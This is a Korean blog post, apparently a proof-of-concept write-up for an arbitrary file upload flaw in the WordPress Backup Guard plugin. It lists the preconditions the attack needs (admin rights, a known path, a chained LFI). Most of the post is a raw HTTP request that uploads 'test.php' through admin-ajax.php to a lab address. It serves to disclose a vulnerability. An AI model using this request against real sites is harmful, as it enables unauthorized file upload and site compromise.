해당 취약점만으로는 webshell을 동작시킬순 없고, 해당 사이트에 전제조건이 몇가지 필요하다. 

1. Backup Guard 를 통해 올린 파일의 경로를 알수 있어야 함. (디렉토리 리스팅이 가능하면 최적일것임.) 

 2. 관리자 권한을 사용 해야함. CSRF등을 통해서 하면 될듯? 

 3. php 확장자로 올라가지 않으므로 경로를 안다고 해도 텍스트 파일로 보일뿐. 따라서 LFI 등의 취약점이 연계되어야함.
POST http://192.168.0.91/wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.0.91
Connection: keep-alive
Content-Length: 1946784
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.0.91
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqE6amufQR0PqHraP
Referer: http://192.168.0.91/wp-admin/admin.php?page=backup_guard_backups
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: wordpress_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C19f158651e5c5c1fe87fe3a2ab632c9506ceb98f23e1d6fd747b05e8668fe492; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_87cfb3563f93a5d2c31273cd0ae7bdba=Sakuya%7C1455929929%7CI7o0EJxhU8ClcrYCEUgAkH6jsG5ra6LSstuEFSbiXXd%7C1f1c5e2111be175767c1f2f14ac571a1fe9a5453240b9e331093ef6ce229f0d9; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1455757129

------WebKitFormBoundaryqE6amufQR0PqHraP
Content-Disposition: form-data; name="sgbpFile"; filename="test.php"
Content-Type: application/octet-stream


------WebKitFormBoundaryqE6amufQR0PqHraP
Content-Disposition: form-data; name="action"

backup_guard_importBackup
------WebKitFormBoundaryqE6amufQR0PqHraP--


Referer : http://www.pritect.net/blog/backup-guard-1-0-3-security-vulnerability


'Web > Wordpress' 카테고리의 다른 글

[wp-plugin] Backup Guard <= 1.0.2 - Arbitrary File Upload POC  (0) 2016.02.18
Posted by Maid:: IzayoiSakuya